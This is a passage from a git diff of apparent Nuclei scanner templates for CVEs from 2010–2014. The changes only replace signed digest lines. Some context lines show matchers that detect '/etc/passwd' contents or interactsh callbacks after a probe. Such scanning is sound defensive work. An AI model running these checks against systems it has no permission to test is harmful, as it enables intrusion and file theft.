file +# digest: 4a0a0047304502202ac5f0a4f9ac3488e5fb632bba8473b66643a43886afa0927f3c711634c8b1b802210095a5da3a584d4804f11a0e4536761c7d8dac1f3bc625bd5f98a40d80c04ed818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 3e0bac5c35..f3708173e8 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206de44a390dc5302759d12fd4001faad67af1b5043d4e5d5a0e99b24cdc4ee516022100e0df13828777ac09065b161cc832acd8bb8369bef83a8222352647a9b20d5b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095d36bc58cabf1166f9a2b788011d6fbc46b38501ea467e227180c4dd1b8b36702203532cec78f34e9a2b01a20cd8f897222e5be1e58dc91a5551005ab1515aa21bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 9074aba40f..8598e72da2 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022036441deef54186effe4bc8c14c01564b3885f6058e30608ad2fe449e677c00a702205c4d8db4d4a05a86268c87cca7d2b6291aa83a4a825791567eefa258512efac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab1ecd9388a72b63dd3c8b790894bb078b4993b8f937584c44f3bf6be66e8c04022100b34366bca7a019753bf817d4238b4917e7694aff29df603e0779819cc1e843b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index a9858ba5cc..22b8f6ae6b 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207f173747822e13f460537c9f352c220b09c207c8d434d6851187c72c919607d9022100b83c290b935b1c2ab7d8803f7fba050894f359981c55eebe2e7b320f92dc2edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b5db4441b5c5baa26a44fcd145acd1ac6103d02222029f4d15456097bff7025022044b70732e749c2c8c2bd5b13cee361bf42387b312d1e0887f6e56d758594d175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index d5b6f27b0a..fee3761067 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220494970bc2de72594ab8da27efeb9427a0eba928ba7e49b4eb191b682bda14ad1022100905b334c25e0b7169d2adbb77e2f68f49d388a46f12a9a13291a7e5a035fe981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a3a16abfd5e11d1d7f96f96005d87bed6cb9df43c8c426cd34e9e332f6c348f0220461e34bf597e44608514e2eadf691fdb5beb7e0c07458b4632983c5725493ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 2ab467d52d..1aad033b9a 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022003c68f4509b734115cf058165538efe2647798f41c8ab2529c8a37ac87adf97502207f242403d316394c9ba49f4394fec2656568c19d07c6d98ce47089acb541779e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025cc6e30cb84746f0baa76f17d04c386fddbc7463f4c2c48735fcff774d37130022065c6a4fdf9b90082d6cd52d6649fed276399c92ff4e218a6b6a0f54e9b9ee78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index c1900d4046..0b0a09610d 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -55,4 +55,4 @@ http: - "regex('root:.*:0:0:', body)" - 'status_code_3 == 200' condition: and -# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201eaffb982a68a851824728b221e93502cf81c0c339a5a281c5f9c00641db37d8022041a162a42e24f9fa8ecd4855c69a7ad4ce469e2c9264b97710267fdddb0ecaf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 11e84a5014..28402a4db3 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f83de4045e23f0aca5040e8aed543ca527c91a15cc2cae8b296ef058dd566b0c02202bb3500a508e65323ec114d0126118c5b4ac2949d083bdee74e4b216a01ec3d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfa76d3df3920ddf964acee2aaee72591040d36facd90b737b65f6c8b0ff3bd7022050d4e056395568421bc46fa8e9dd845d1569313207399bd8a6b6a040455c3957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 114f3e7776..3cefe3050b 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100900756dfcc6df6c56c912725d923b0e4907624843873d7fbba36f386e808dab00220782a401d28335add23c3b2a288a4f7a0baaae8d70301ef86c098d36b36d5bc56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d717f5eb08685f108608685c5e8bc7e0fa7b195d96e3ee4ba18a7cfd5801754702205446ddf30092518c98fa353add7e50550a3ccdeab1c121aa92ffa8245ed2642d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 8f220b05ad..7d686f7ade 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a2506e8b9e69b40dd782552d8c266a500621c29093bcef9f8654764f7b7c87d0221008d4c442a6894e2c5eed83217df00622fc53439ae7005c6d5ecdef9bf9848c666:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb05c920e3e17a004105d6b5d95f1fd2d332522302f25e8537bd0ba5e8b4bfd3022100d40568d232c5343ba0286319db6b9ebb72158caccfc6888796e640014a9aa10a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index cf2c318187..e1b6ffd54d 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021aa179c04ce2a829ef44ba257c42d88cbde9a43eba43b3b07972b29379e757502201f591e5f16db499bbe949d543c95bbde9e5f13caac80365ebfd8d99eba1a4be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2d4487a5501ae1811586db048fdc2cb43c5981b65f2824f90665f570c9a206202202267f35270d92aa00788ea3eeb8ba6232d8fefc58bc33b6bc7f0ce3ea155c0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 8793d25fc2..b83bdf4f2f 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022072425cfa2e69f5fa975af9f2e3a07d7fb421d28e5e3a6ef9bf4fb15dcd35bb82022062abc830f020b69a5b77fdae924fcab7f7cbd217c9dc1fbbb1eebe9affc4c9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200e7f17ca825045fd5ec22759afdf7174629b996625b9f6be48597e293f3803c3022100a587d5833d1c9bbeb989412eb4eaf65b56c5ec3b851e353fbc831063a3748fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index fd3f0db7f6..67b209063c 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e50430794e085ca63102b35b09c53e606d6053f7a358289dbb8a1dab676590b1022012914006ad07c047eaf7c2383f800f1e5dc232a9f738f5497822f03a9a28f876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bbf86e708d5052738152ccb3c3e3644e742d29df19908a2f9e93c4d3b0ae6a7022100edc6714bc5c4a93886c03124896afd2172be7d9ababc019568c20b559bbae879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 73e0f5e6ae..1c83b0d3de 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099f50866d74ee7d1871049c1a234874fd8a1df1db316942d76ccb8bcb1e8f064022100aae0853112ff4ae4e6bccc269ed1dca993e734d09a3a75aaae9880afa793b6f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dd8c1c47f988e352064f8076ab0213428202922a2ea124638b4e3c9b9b19c6f02200ec32d17a3e91604e9741f85056d40220c143b9849ff66124b453479caa640a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index f0e1115c83..0773a1bb36 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b96c6c74e4798235cec35053af8066d4dc6794a43e3df0b61f63109567e9189022100c8cd5a0b80864664a9fdf6bc321b718f5c0ff878c5350698f3aaa6393a671d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6fd6920f74970c98524bd8c651ad2bfe51d737265c753018e90239927092d5602210095be05e1174dcc1fabe44d3f68fe3f19026ddf9d8d6a66b9246fd64b1e5a0f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index a27467581e..72b7c54fd1 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f513fcbb707f6870b597e07bdde31074079404931037f69b23312866186588cf022100cffc9642a1750c8be27cb6de66c1984e527cb08df8261a53c592a6909deeeb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c52d46badf6a9fb78ec08f5843c6acb660464e72ff79d7e8dc3268397c230d7e022005a1350eca603c0af65ba683420f8fab2f5d2173423b75a641d4e8a3d07db191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ca3ca13532..a0e5d5ceae 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009352954dcdd74fb838167e01395be39d74dca52243c96bf249d09954d7922ba5022100faeed378840240fe1acf3ed021365ac3f1acc04610e0c477fdb951466c280ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd9c2eba04583bf307715f49c0a9b8dcb35e54b05488eb76bca471449fc8578d02201cbf02452243791fb963618b87705a68b11618dd34035663df56beeae79d4e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 37f9bbe534..2913acd5e2 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a152c975bd407714f7ee31557ef230986900c9b1c6332fc65085667dde221124022100afe88e47680ff10d649c0598333468b836589978fc76a76ec954cc6615ee1dd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a68872c0120c49c2ba1aef340825a78fbbe93fa9d3933600679f4ca0b123aa7022100f7bb18b55478b50e8860386f6f160a8bb309aca156ad8d5d33ff53cb31e7e5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 0c29ca82d9..ee4d59d28b 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -71,4 +71,4 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 4b0a00483046022100e2b755657c831d182f3e083f1324c8f181ec2a70e19c6017b6c30531c751ffe8022100f1c6303b12279e4b5b7352781958ff2324fd79bc2d862b7b06be52f1e41ee698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073b059f06469d58c867070e171a4533bb976f5775453e911a3c02a02e0f7648b0220210d93050cb989bbd9f6a41297ef913318659adb3a0fdb23d50c031072dd0ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 23fac3c9ac..04e5dde1b0 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -51,4 +51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100ee9d837e70b676d11e501a5486b5c0d956d0fde58e815eee2d49972196ce1a6802207e4e2e3002e677556026c5984d545360653b9b6730f239e6470757314a608880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a26f4858915a56030092800bf1f71a30d4c6bbb2d65af1b97307df3af2370a202200387753f9b464f8878e789c36df39c2d8df8a8df9e2a86ac5dcf1db35690f7ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 9c0290739d..aea8667020 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a5643ac451046ed36a4bd0abee8e4625b5b9aaab446c88ecdc2de6123ace8ca022100d81885691908ee4848f60a645025945bbb6be535fe1e02995ba96597161ac6fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f322610921b216cee6caa7ac536c05dd12be0219e40dc2043b448b65fb87d2ac022100a5d43d8609bdbcb3d8d0a1c76313c928e074f2f05299cb8a52c1d0e6cedd3068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 665ac342d1..20c8be978a 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034f990a5bff340326f593c8b149d2c1411d20ed9cf0844eb64585b1dbdc6f1e202204f319f36ce4f7c1b596ec339117b0cb8b258df92388a6d342faa644f81bc658f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf2959f6c0a7bd68f61e6edc7c0de5abc7e587704c1d8914f46c881f3ca118e402203faa0292a5e4bd71f7706588f37e2c754db8827daf38264dc97f26d3d473a380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 7d235fb8b9..b8448f8ab6 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1bea933ca3d1732f9ad83368f4cf377156a4bddad1d3c2423e222138422395e02206fd3624c38c3ea36b4d70f18c985bb3e78b1a2f851339fa0e1983173d7ddc32d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009495c090f698113d0e1574cb3dcbc0b559ad192f6a04012c7dfdd06de3faf3bf02206ac6fe436c81ac4a8f630ef89c1293168cc6e9c8e15a8736c309a8b827967131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 029665f8ca..54c7378680 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c6b1194c6ae8f5320d7a56775f9cb797dc6c5814de345683c601db5630265a47022100e97d9a7120eecbc820e2306076e3f6814f97f68476d720af764153f521d12892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daff72673225c1d5295cf598ad635b40a32ac87c4997268008e72526606b0dd602202b6a0b28d688f686fa7cc48e1362b713eb04eea95e138a13e9acd1ba27d2f2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 75264eca72..4ff4b2bd84 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -43,4 +43,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a004630440220135dfc4a7ae9664bb15c696ab57100ebe3aac536a3149a7c2e85379d9c2385b802202532abf6841721c06135ae12e7fa664254438c6abe917cf0d2b6d7bec3372034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205123649a5c5a0cf48e5504f37641df07c39118a5bf9d04602c312ddaf1829f4a02200d0a386529b388651d5e905d36a1424e739186e1aad43157264eefa4369d25dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index a764faa850..89721b98d3 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d919be78f24b6399d013ac974a5f6befc623e0d4e201fc5c1974b38cd8d146710220035ecd90eb365025b639d5c0660a56a44aac430567c209e137a67c272279b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fe33a98fffb2f7bd719f8835979dce71ac15ffda6a390c507485268dba885130220611cdd56362890cd14694b9b8b068971580e88a58747d31ad37b7af05c7b070b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 18bda7acf5..3c027dfa1b 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207c0a7c8038a6a1b54303fadd95ed235b6ceb902a3d4d0f9b5013c8c70f423ee8022100829d06644ac58eb979bf3a10cc48bc0a375cf7498a367a4207bc921527238603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220168f2ceafa9398f1fc6df358204734263379eb8fe96271e8fc739cebecf201d702210082d01b4e4bb988273ae94292d6e113c8ae25ac0b8364cbdd2ad53c5b51b4fa37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 9457daca56..62890aabb0 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -47,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100ff8a98ddb1c2c308eb08b8d79fc1dc2fe5b594fdb7d25398afd47cbbddafda5e02210082fa401f641a39d159006d7f9126437f76c703ab1a812e64c444e6bc06c8f261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f654b7a881c93c5b0fd6ba6f0ab4afd3e589a70ebb01f72b93608c15dc283920022100939385f30db5129f2b3d3a76aa8eca8b29c1522186d11e10a97b5805ab8fb7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index c878a37996..e02def3150 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -70,4 +70,4 @@ http: - 200 - 400 condition: or -# digest: 4b0a00483046022100e84e436f1f441c80631181ac85badd1fc9886b8d08455a5a08c4780e3cd957dd022100bb8d247e5e75816b9cc487a75474b8e7feef363cfaa59c81b7fc8e9eec73b8de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b1c8d92dec0571023b7888f874ed36cee640fde6f0530d37512f77d921700b50220357fa02c4e643f3e3dfb577a873454e767ee8c023840bac3fe72af9f626e3271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 22e158038f..4db1803823 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc6be725ce1fa7221cd40b25f6da20c4d0ee44b8e6a0d422685f0dfaee45ca530221008a1f987a944e6c3a9816e8666409a3e55beff3fcd41c87a64d0abd82a4912c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f5a88bdea6734d0ab391b6fd5fd8bb17242dabdbf218f078c26dbbf2c20174b022100d2610dcc53a2bbfefe240bb8964c81be7f35628b5cc37995ab62ac5be77bed16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 7449461487..032544c7d5 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d19bf8ecabd7a342d56adcd4297422852393ef6cab78e9993256c41d6c2db430220074c888f7d143372b84efadd2f31976fce9a6ff6d731e2f4d7600420e1841a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ee2266839819c8d988e3fa222e2c471bcd72d268986a3b55ef7cd5254078659022040278011c08a10348e0f4b2c391a9cd541c03006764111a8bf756d82c5e581c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 7b0d6009d7..e9e7a09ba8 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100966b6b0b4a918a9f1fe55193d0249a46797f4a82799feecc379d2ede00c2f55d022100f685671f8e03e4877d9ea71c119d6f6ccfcb1303458bae06f08b9e555b5de2f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5aaa0cf657fb07a07b2e7f3dbfb89dfcfd5ecbec95eebcc67d0a16b7027742b02205cda39d97b2037ad46ec76430102bb2e98c99138c3a92af1bca614d667d8489c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index f7c0f63fdb..7cdb37a482 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220397810d5ab8ab8b82f64ed1972fcb4abbed706f9505884c65d0a216b8106bf74022100f6a6c3dd9166fb7eb7fc1c173342685ee35ef5484e3393b47a66dba7364882f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c958d79410ad591fa2266c2b04eb8d7b3d525fca53a54ead760998f2e163fd26022100c109ae2b7329ce4d425213b85afdd9ff66c41bdf0846af67bac4d362e20a63bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 5571d2d703..3f732309dc 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220315dc27edeacd92d3299ed551a1c5240bb5e5614f6db9563557329a591ce0cab02206a8b19bd91d668619cbeafdeaa4d846d824db2454665b54bd25a4df79e2838f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204c44193b31a02e7585af9ec5c9df0727f0f1e7b63e659ef93b412bf388a4e29602210099ce26c6f7ced200e5e68bafefba1417b599b21923293f73cfc2b9a71c2855fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index e0d2283530..506c1e58dd 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -62,4 +62,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 4a0a00473045022018e933dc0b64a50fc2fb2291fe0fe068e3b6ce401606ccfaca77a770b2b90880022100a65f7680f5397809fd6e7166167c9d7fb89e30c85c2c4ce8e5ddf62ff1c513fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 39dcfcb2c8..813bdf1493 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049b8ea9cbd2fa929aa91ebd5b734ff975d68a95cb7309c5722750786994f087f022100d8d5e0f1863f9e622519db5e0f48835399352bb411c8fffc895001144cbea940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 4a998c9e31..41aa5161be 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402207af10a42ac3fac82b8537fcd02ef03a3d6d1c789570c336dd960af2488b7656a02200bf8bf6552331293f0e50b7c92c5874a81bc4df67abaae00fa0bd4042a8ea2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024a1654afe7bde29b350accd5cf34bb2575b99274016117766b2d7a6b9e5a659022100add0a9c974f07fc406642d59899f025dd12cf87ed60f6ec3d0ec43f1db290caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 3bfcc78127..2a11e6bcce 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ 